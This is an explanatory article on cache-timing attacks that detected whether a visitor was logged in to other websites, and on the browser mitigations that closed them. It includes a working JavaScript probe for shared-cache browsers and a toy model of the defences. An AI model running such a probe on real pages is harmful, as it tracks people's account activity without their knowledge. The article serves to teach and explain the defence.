A cached, authenticated resource loads faster than an uncached one.
Until browsers shipped the mitigations below (2019–2021), any website could measure this and infer whether you were logged in
to other services from timing alone: no cookies of its own, no user interaction, no permission prompt,
and typically in well under 100 ms per target.
The attack required zero cooperation from the target site and worked in every major browser.
Browsers closed it between 2019 and 2021 with partitioned HTTP caches and SameSite-by-default cookie policy.
why the probe no longer works: Modern browsers partition the HTTP cache by top-level site, so a resource cached during a
visit to the target site is simply absent from the attacker page's partition, and cookies default to SameSite=Lax, so the
cross-site subresource request is sent without the user's session cookie and the server returns the same unauthenticated
response whether or not the user is logged in. A cross-origin fetch() without CORS headers additionally fails at the read
step, but that is incidental: the original attack never needed to read the response, only to time it.
What the attack looked like before partitioning: An attacker page loaded a resource from the target site, for example
https://facebook.com/favicon.ico, via an <img> tag and timed the load. For a user who had the resource in the shared
cache it came back in ~5ms. For everyone else it went to the network, triggering a redirect and auth check, and took 80–200ms.
The gap separated the two populations with >90% accuracy. The caveat a practitioner wants: the probed resource has to be
one that is only fetched, or only cacheable, in the logged-in state. A favicon that every visitor loads only tells you the
user has visited the site, not that they are logged in.
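The probe as it worked in a shared-cache browser, as an added example that is not the page's own demo code. It times one opaque cross-site image load against a cache-busted baseline for the same site and classifies the result. The target URL, the 0.25 ratio and the sample count are assumptions for illustration, not measured values; the browser-only parts (`Image`, `performance`) are separated from the pure classification logic.

```javascript
// Added example, not code from the original page: the pre-partitioning probe
// plus the classification step that turns raw timings into a guess.
// Assumptions (illustrative, not measured): TARGETS lists resources that the
// target site only serves and caches to logged-in users; the 0.25 ratio is a
// placeholder threshold.

// Time one load of `url` as an opaque cross-site <img>, exactly as the attack
// did. Browser-only: `Image` and `performance` are DOM/browser APIs.
function timeImageLoad(url) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    // load and error both fire only after the cache lookup or network round
    // trip completes, so the timing leaks even though the bytes are never readable.
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}

function median(samples) {
  const s = [...samples].sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Decide from one probe timing against a per-site uncached baseline. A probe
// that finishes in a small fraction of the network baseline came from the
// shared cache, i.e. the user fetched it while logged in.
function inferLoginState(probeMs, baselineMs, ratio = 0.25) {
  return probeMs < baselineMs * ratio ? "logged-in" : "logged-out";
}

// Run the probe for every target. The baseline is measured with a cache-busting
// query string so it always misses. The real URL is probed exactly once: the
// probe itself stores the response, so any second load would always hit.
async function probeLoginState(targets, samples = 5) {
  const results = {};
  for (const [site, url] of Object.entries(targets)) {
    const baselineRuns = [];
    for (let i = 0; i < samples; i++) {
      baselineRuns.push(await timeImageLoad(`${url}?nocache=${Date.now()}-${i}`));
    }
    const probeMs = await timeImageLoad(url);
    results[site] = inferLoginState(probeMs, median(baselineRuns));
  }
  return results;
}

// Hypothetical target; the host and path are placeholders, not real endpoints.
const TARGETS = {
  "social.example": "https://social.example/account/avatar.png",
};

// In a shared-cache browser: probeLoginState(TARGETS).then(console.log)
```

In a current browser the same code still runs, but `probeLoginState` reports "logged-out" for everyone, because the probe's cache lookup happens in the attacker page's own partition and the request carries no session cookie.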
browser mitigations timeline
2000: Felten and Schneider document the timing side channel for login state detection in “Timing Attacks on Web Privacy” (CCS 2000). The shared HTTP cache is probeable from any origin.
2010: Widespread exploitation via <img> tags and XMLHttpRequest (fetch() arrives later, in 2015, and works the same way). No browser mitigation; works across all browsers.
2016: SameSite cookie attribute proposed and first implemented (Chrome 51). Not yet enforced by default in any major browser.
2019: Chrome 76 ships SameSite=Lax-by-default behind a flag; default enforcement arrives with Chrome 80 in early 2020. Partial mitigation: the probe request loses the session cookie, but the cache is still shared.
2020: Chrome 86 ships HTTP cache partitioning (the cache key includes the top-level site and the frame site, not just the URL). Safari 13.1 blocks all third-party cookies by default; WebKit had already been partitioning its HTTP cache by top-level site for years. Firefox 85 ships network partitioning in January 2021.
2021: The attack is largely defeated in modern browsers. CSS :visited history sniffing and other XS-Leaks remain partial vectors in some configurations.
history of login state detection attacks
The timing side-channel attack for login state detection was first documented by Felten and Schneider (2000, “Timing Attacks on Web Privacy”). The key insight: browsers kept one HTTP cache shared across all origins. If you are logged into Facebook, the resources that only the logged-in version of the site loads are in that cache. Any page can try to load one of them and time it: cached = fast = logged in.
The attack was publicly documented, widely known, and remained exploitable for over a decade. Major browsers finally patched it between 2019 and 2021 through a combination of:
SameSite cookie policy: cookies default to SameSite=Lax and are no longer sent on cross-site subresource requests, so the probe request is unauthenticated regardless of login state
Partitioned HTTP cache: entries are keyed by the top-level site (and, in Chrome, the frame site) as well as the URL, so the attacker page's partition never contains what the target site cached (Chrome 86, 2020; Firefox 85, 2021; Safari earlier, with 13.1 in 2020 completing third-party cookie blocking)
CORS, by contrast, was never a defence here: it blocks reading a cross-origin response, not requesting and timing it, which is all an <img> or no-cors fetch() ever needed
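A toy model of the two mitigations above, added here as an example rather than code from the page, so the effect on the probe can be checked without a browser. It keys a simulated cache by URL alone (shared) or by top-level site plus URL (partitioned), and applies the SameSite rules to decide which cookies ride on the probe request. The site names, cookie and resource path are hypothetical; real browsers also key the cache on the frame site, which the model omits.

```javascript
// Added example, not code from the original page: a toy model of cache
// partitioning and SameSite cookie policy. Site names and paths are hypothetical.

// The HTTP cache, keyed by URL alone (pre-2020) or by top-level site + URL
// (partitioned). Real browsers also key on the frame site; omitted here.
class HttpCache {
  constructor(partitioned) {
    this.partitioned = partitioned;
    this.entries = new Set();
  }
  key(topLevelSite, url) {
    return this.partitioned ? `${topLevelSite} ${url}` : url;
  }
  store(topLevelSite, url) {
    this.entries.add(this.key(topLevelSite, url));
  }
  isHit(topLevelSite, url) {
    return this.entries.has(this.key(topLevelSite, url));
  }
}

// Which cookie names a browser attaches to a request for `requestSite` made
// from a page whose top-level site is `topLevelSite`. Lax cookies go on
// same-site requests and top-level navigations only; Strict only same-site;
// None everywhere. Cookies with no attribute are treated as Lax (the default).
function cookiesSent(cookies, topLevelSite, requestSite, isTopLevelNavigation) {
  const sameSite = topLevelSite === requestSite;
  return cookies
    .filter((c) => c.site === requestSite)
    .filter((c) => {
      switch (c.sameSite) {
        case "None":
          return true;
        case "Strict":
          return sameSite;
        default:
          return sameSite || isTopLevelNavigation;
      }
    })
    .map((c) => c.name);
}

// Hypothetical authenticated-only resource and the session cookie for its site.
const SECRET = "https://social.example/account/avatar.png";
const SESSION = [{ name: "session", site: "social.example", sameSite: "Lax" }];

// Scenario: the user visits social.example logged in (the authenticated-only
// resource gets cached), then lands on attacker.example, which probes it.
function simulateProbe(partitioned) {
  const cache = new HttpCache(partitioned);
  cache.store("social.example", SECRET);
  const firstProbeHit = cache.isHit("attacker.example", SECRET);
  // The probe's own response is stored too, but only under the prober's key.
  cache.store("attacker.example", SECRET);
  return {
    firstProbeHit,
    // A repeat probe hits in the partitioned model as well, yet that hit
    // reflects the attacker's earlier load, not the user's visit to the site.
    secondProbeHit: cache.isHit("attacker.example", SECRET),
    // With SameSite=Lax by default the <img> request carries no session
    // cookie, so the server's answer cannot depend on login state either.
    cookiesOnProbe: cookiesSent(SESSION, "attacker.example", "social.example", false),
    cookiesOnFirstPartyLoad: cookiesSent(SESSION, "social.example", "social.example", false),
  };
}
```

`simulateProbe(false)` reports a hit on the first probe (the pre-2020 leak); `simulateProbe(true)` reports a miss, and in both models the probe request carries no Lax cookie, so even the uncached response is the logged-out one.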
Before these mitigations, the attack required: one malicious webpage, a list of target URLs, fetch() or an <img> tag, and a timer. No user interaction. No permissions. No cookies from the attacker.
Variants using CSS :visited link styling (history sniffing) remain partially effective in some configurations. Reading the style directly via getComputedStyle() has not worked since browsers changed it to report the unvisited style (around 2010–2011); the surviving variants are rendering and timing side channels around how :visited links are painted.